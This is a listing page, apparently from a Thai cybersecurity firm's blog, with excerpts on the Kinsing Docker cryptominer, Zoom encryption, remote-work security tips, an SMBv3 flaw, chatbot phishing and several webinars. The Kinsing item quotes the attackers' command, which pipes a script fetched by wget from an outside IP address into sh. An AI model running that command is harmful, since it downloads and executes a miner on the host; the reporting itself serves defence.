พบ “Kinsing” มัลแวร์สายขุดเหมืองบนDocker มีอัตราการแพร่กระจาย 1,000 พอร์ต/วัน

ขณะนี้ผู้ให้บริการคลาวด์คอนเทนเนอร์อย่าง Docker กำลังประสบปัญหาจาก “Kinsing” มัลแวร์แบบแพร่กระจายตัวเองที่อาศัยช่องโหว่จากการตั้งค่า Docker Daemon API ที่มีการเปิดพอร์ตสาธารณะไว้ โดยมีเป้าหมายในการโจมตีสูงถึง 1,000 คอนเทนเนอร์ต่อวัน รูปแบบการโจมตีเริ่มจากการที่ผู้โจมตีค้นหา Docker API ที่มีการเปิดพอร์ตสาธารณะไว้ แล้วทำการเชื่อมต่อเข้ากับพอร์ตดังกล่าว ก่อนที่จะทำการรัน Rogue Ubuntu container เพื่อเรียกใช้ “Kinsing” ให้ไปดาวน์โหลดคริปโตไมเนอร์มารันบนเครื่องเป้าหมาย จากนั้นจะทำการแพร่กระจายตัวเองไปยังคอนเทนเนอร์และโฮสต์อื่นๆ ต่อไป คำสั่งที่มักจะพบในการโจมตีคือ “/bin/bash -c apt-get update && apt-get install -y wget cron;service cron start; wget -q -O – 142.44.191.122/d.sh | sh;tail -f /dev/null.” เพื่ออัพเดท Docker…
Read More

Zoom ยอมรับไม่ได้เข้ารหัส end-to-end จริงอย่างที่โฆษณา แต่ใช้แค่ TCP/UDP

อย่างไรก็ตามเมื่อ The Intercept สอบถามไปยัง Zoom เรื่องการเชื่อมต่อแบบ end-to-end ก็ได้คำตอบกลับมาว่าตอนนี้ยังทำไม่ได้ Zoom ใช้แค่ TCP ร่วมกับ UDP เท่านั้น เท่ากับว่า Zoom ยังสามารถเข้าถึงข้อมูลและวิดีโอผู้ใช้งานได้อยู่ ซึ่งอาจส่งผลถึงกรณีที่รัฐบาลขอข้อมูลผู้ใช้งานจาก Zoom แบบเดียวกับที่ Google, Facebook และ Microsoft โดน (แต่บริษัทเหล่านั้นมีการออกรายงาน transparency report) Zoom ให้เหตุผลว่าที่ใช้คำว่า ‘end to end’ เพราะการเชื่อมต่อระหว่างปลายทาง (endpoint) ที่เป็น Zoom นั้นถูกเข้ารหัส (‘connection being encrypted from Zoom end point to Zoom end point‘) หรือกล่าวอีกอย่างคือ…
Read More

10 เคล็ดลับความมั่นคงปลอดภัยในสถานะการที่คุณต้องทำงานที่บ้าน

ในเวลานี้กระแสของเชื้อไวรัส COVID-19 นั้นส่งผลกระทบในวงกว้างในประเทศไทย และทั่วโลก ทำให้บริษัทหรือหน่วยงานต่างๆตื่นตัวในการเริ่มมีแนวคิดที่จะดำเนินการทำงานที่บ้านมากขึ้น ทางทีมจึงขอนำเสนอ 10 เคล็ดลับที่จะทำให้องค์กรของท่านปลอดภัยทั้งทางโลกไซเบอร์และตัวท่านเอง ดังต่อไปนี้ 1.ทำให้พนักงานเริ่มต้นทำงานที่บ้านได้ง่าย ในการทำงานที่บ้านต้องมีการตั้งค่าอุปกรณ์และเชื่อมต่อบริการต่างๆของหน่วยงาน อย่างเช่น E-Mail, Internal Service หรือ Sales Force เป็นต้น โดยเพิ่มโซลูชัน Self Service Portal (SSP) ที่ช่วยให้พนักงานสามารถตั้งค่าทุกอย่างได้ด้วยตนเอง และยังช่วยลดภาระของฝ่าย IT ได้อีกด้วย 2.ตรวจสอบให้มั้นใจว่าอุปกรณ์และระบบของท่านได้รับการป้องกันที่ดีพอ ดำเนินการตรวจสอบให้แน่ใจว่าอุปกรณ์ต่างๆ รวมถึงระบบต่างๆ ได้มีการอัพเดทแพตช์ให้เป็นปัจจุบัน เนื่องจากมัลแวร์ส่วนใหญ่นั้นอาศัยช่องโหว่จากการที่ผู้ใช้งานนั้นไม่ดำเนินการอัพเดทแพตซ์โจมตีได้ 3.มีการเข้ารหัสอุปกรณ์ เมื่อมีการนำอุปกรณ์ออกจากสำนักงานมักจะมีความเสี่ยงมากขึ้นเนื่องจากเสี่ยงต่อการสูญหายหรือโดนขโมย ควรมีการใช่เครื่อมมือเสริมในการช่วยเข้ารหัสเช่น BitLocker หรือ FileVault เป็นต้น 4.สร้างการเชื่อมต่อที่ปลอดภัยกลับไปยังหน่วยงาน มีการใช้ Virtual Private Network (VPN) ช่วยในการทำให้แน่ใจว่าข้อมูลทั้งหมดที่โอนระหว่างพนักงานกับเครือข่ายองค์กรนั้นมีการเข้ารหัสและมีการป้องกันในระหว่างถ่ายโอน รวมถึงไม่ถูกเปลี่ยนแปลง 5.มีการเพิ่มระดับการป้องกันเพื่อความปลอดภัยของอีเมล เนื่องจากการทำงานที่บ้านนั้นส่วนใหญ่จะมีการติดต่อผ่านทางอีเมลเป็นส่วนใหญ่…
Read More

พบช่องโหว่ร้ายแรงของ SMBv3 ไร้การอัพเดท

ช่องโหว่นี้เกิดจากข้อผิดพลาดเมื่อ SMBv3 (CVE-2020-0796) มีการจัดการแพ็คเก็ตข้อมูลข้อมูลที่ถูกบีบอัดที่ออกแบบมาเพื่อประสงค์ร้ายและอนุญาติให้มีการเชื่อมต่อระยะไกลได้ ผู้โจมตีสามารถใช้ประโยชน์จากมันเพื่อเรียกใช้รหัสได้ตามอำเภอใจ โดยช่องโหว่นี้ยังไม่มีการประกาศจาก Microsoft และไม่มีการออกประกาศอัพเดท ผลกระทบ Windows 10 version 1903, Windows Server version 1903, Windows 10 version 1909, Windows Server version 1909, คำแนะนำ ปิดการใช้งาน SMBv3 ถ้าไม่จำเป็น โดยสามารถใช้คำสั่งดังต่อไปนี้เพื่อปิดการใช้งาน Set-ItemProperty-Path “HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters” DisableCompression -Type DWORD -Value 1 -Force ดำเนินการ Block Port TCP 445 จากเครื่อง Client และ Firewall ที่มา: https://www.bleepingcomputer.com/news/security/microsoft-leaks-info-on-wormable-windows-smbv3-cve-2020-0796-flaw/
Read More

พบการโจมตี Phishing ในรูปแบบใหม่ จากการตอบของระบบ Chatbot อัตโนมัติ

Malware Hunter Team พบการโจมตีรูปแบบใหม่ ในการหลอกเหยื่อด้วยแชทบอท ใช้เหยื่อกรอกแบบฟอร์มต่าง หนึ่งในข้อมูลที่หลอกลวงคือบัตรเครดิตและข้อมูลบัญชีธนาคาร หลังจากเหยื่อได้มีการทำรายการเสร็จเรียบร้อยแล้ว ระบบจะตอบกลับมาว่าพบสิ่งผิดปกติเกิดขึ้นว่าไม่พบข้อมูล จากนั้นขอให้ผู้เสียหายส่งข้อมูลอีกครั้งเพื่อเป็นการยืนยันข้อมูลว่าเหยื่อได้กรอกข้อมูลที่ถูกต้องกลับมา คำแนะนำ : ควรตรวจสอบ URL เว็บไซต์ว่าเป็นเว็บไซต์ที่ถูกต้อง และหากว่าระบบมีการตอบกลับมาว่าคุณมีเงินได้คืน ควรโทรไปตรวจสอบกับผู้ให้บริการเพื่อเป็นการยืนยันอีกทางหนึ่ง ที่มา: https://www.bleepingcomputer.com/news/security/intricate-phishing-scam-uses-support-chatbot-to-assist-victims/
Read More

Webinar#4 “How to Build Incident Response Team”

Topic ในปัจจุบันแนวคิดในการป้องกันการโจมตีทางไซเบอร์นั้นจะมีด้วยกันหลายมิติตั้งแต่ Preventive. Detective. Corrective ซึ่งแนวคิดในการ Detect และ Response นั้นเป็นรูปแบบที่ทำให้ลดความเสียหายจากการโจมตีทางไซเบอร์แม้ว่าจะถูกโจมตีจากภัยคุกคามที่มีความหลากหลายและเป็นเทคนิคการโจมตีระดับสูง ดังนั้นการจัดตั้งทีม Incident Response จึงมีความจำเป็นในการตอบโต้ การโจมตีต่างๆ อย่างรวดเร็วเพื่อให้เกิดความเสียหายน้อยที่สุดและเป็นแนวทางที่ถูกแนะนำในมาตรฐานสากลเช่น PCI/DSS, ISO27001:2013, NIST Cybersecurity Framework เป็นต้น เพื่อที่จะตอบโต้การโจมตีต่างๆ อย่างถูกต้องและรวดเร็วเพื่อทำให้เกิดความเสียหาย ต่อองค์กรของท่านน้อยที่สุด หัวข้อการสัมนาออนไลน์ What is Incident Response Team Incident Response Team Skill and Competency Incident Response Methodology Incident Handling Checklist How to Handle Cybersecurity Incident กิจกรรม แชร์…
Read More

Webinar#3 “Lateral Movement from Hacking Web Server”

Topic เป็นเนื้อหาเกี่ยวกับการโจมตีทาง Web Application ที่เป็นเทคโนโลยีหลักที่มีการใช้งานอย่างแพร่หลาย โดยรูปแบบการโจมตีทาง Web Application มีหลากหลายแต่สิ่งที่เราต้องมีความเข้าใจคือเมื่อเราถูกโจมตีและอาจจะตกเป็นเหยื่อของ Attacker แล้วเราจะมีวิธีตรวจจับหรือสิ่งที่ Attacker จะดำเนินการต่อไปและสามารถต่อยอดอะไรได้บ้าง หัวข้อการสัมนาออนไลน์ Introduction to OWASP Top 10 Next Movement after Compromised Web Server Compromised Web Server IOC(Indicator of Compromise) Web Application Security Practice Recommendation Demo: Server Side Request Forgery วิทยากร อ.วัชรพล วงศ์อภัยCEO / Founder SOSECURE co.,ltdCISSP ,SANS GCIH…
Read More

Webinar#2 “How to Detect Cyber Attack”

วิทยากร อ.วัชรพล วงศ์อภัยCEO / Founder SOSECURE co.,ltdCISSP ,SANS GCIH and GCFA ,SSCP ,CEHv8 ,ECSA ,Pentest+ ,Security+ ,MCT ประวัติวิทยากร ได้รับรางวัล ISC2 Announces 2015 Asia-Pacific Information Security Leadership Achievements (ISLA) ผู้ดำเนินรายการร่วม The Hacker TV ช่อง Nation TV ที่ปรึกษาด้าน Cybersecurity ให้กับหน่วยงานภาครัฐและเอกชน วิทยากรบรรยายด้าน Cybersecurity ให้กับหน่วยงานภาครัฐและเอกชน อาจารย์พิเศษบริยายหลักสูตรปริญญาโท สาขา Cybersecurity
Read More

โครงการ Road to Cybersecurity รุ่นที่ 3

          SOSECURE บริษัทที่ปรึกษาด้านความมั่นคงปลอดภัยไซเบอร์ เปิดตัวโครงการ Road to Cybersecurity รุ่นที่ 3 เปิดโอกาสให้นักศึกษาระดับปริญญาตรีชั้นปีที่ 4 สาขา IT เข้าร่วมอบรมหลักสูตรด้านความมั่นคงปลอดภัยไซเบอร์ระยะสั้น เพื่อปูพื้นฐานด้าน IT และต่อยอดด้วยองค์ความรู้ด้าน Cybersecurity โดยอาจารย์ผู้เชี่ยวชาญเฉพาะด้าน นักศึกษาที่สนใจสามารถสมัครเข้าร่วมโครงการได้ฟรี           “เราต้องการยกระดับความรู้และทักษะด้าน Cybersecurity ให้แก่นักศึกษาในระดับอุดมศึกษา เพื่อให้พร้อมออกมาทำงานในยุคที่ตลาดงานด้านความมั่นคงปลอดภัยมีความขาดแคลน พร้อมทั้งช่วยให้นักศึกษาสามารถค้นพบได้ว่า ตนเองเหมาะสมและมีความชื่นชอบงานด้าน Cybersecurity หรือไม่” — คุณวัชรพล วงศ์อภัย ประธานกรรมการผู้จัดการ SOSECURE Co., Ltd. เจ้าของโครงการ Road to Cybersecurity กล่าว           • ระดับ Basic : ปูความรู้พื้นฐานทางด้านคอมพิวเตอร์ทั้งในส่วนของ Network, Application และ Systems          • ระดับ Intermediate : ต่อยอดด้วยองค์ความรู้ด้าน Security ทั้งในส่วนของ Network,…
Read More
ความปลอดภัยทางไซเบอร์

Hacking Contest 2019

การแข่งขัน Offensive Security ที่มีเงินรางวัลมากที่สุดในประเทศไทยรูปแบบการนำเสนอการแข่งขันนั้นจะเป็นรูปแบบใหม่ที่ไม่เคยมีที่ไหนมาก่อน เพราะครั้งนี้เราจะจัดให้ผู้ชมได้มีส่วนร่วม ในการรับชมการแข่งขันกันได้แบบสดๆผ่านช่องทาง Facebook Live โดยทีมพากษ์ Streamer มากประสบการณ์จาก SOSECURE มาบรรยายถึงเหตุการณ์ในขณะแข่งขัน ให้ท่านได้ฟังแบบสดๆ ผ่านช่องทาง Social Media พร้อมทั้งยังได้ความรู้กลับไปอีกด้วย รูปแบบการแข่งขันเป็นการจำลองสถานการณ์ที่เกิดขึ้นจริงมาเป็นโจทย์ของการแข่งขันโดยถูกออกแบบจากทีมงานที่ ผ่านการออบแบบโจทย์ของการแข่งขันในระดับ ประเทศหลายหน่วยงาน ไม่ว่าจะเป็นหน่วยงานภาครัฐหรือกองทัพทหารในภาคต่างๆ และหลังจากจบการแข่งขัน ทีมผู้จัดงานจะทำการเฉลยโจทย์ที่ใช้ในการแข่งขันครั้งนี้ผ่านช่องทาง Online ต่างๆ งานนี้ได้ประโยขน์กันทั้งทีมผู้แข่งขันและผู้ชมที่อยู่ทางบ้านอีกด้วย กำหนดการการแข่งขัน 01/02/62 รับสมัคร 22/02/62 ปิดรับสมัคร 01/03/62 รอบคัดเลือก (Online) 16/03/62 แข่งรอบชิงชนะเลิศ 16/03/62 จับรางวัล Lucky Draw กำหนดการแข่งขัน วันที่ 16 มีนาคม 2562 เวลา 12:00 น. ลงทะเบียน…
Read More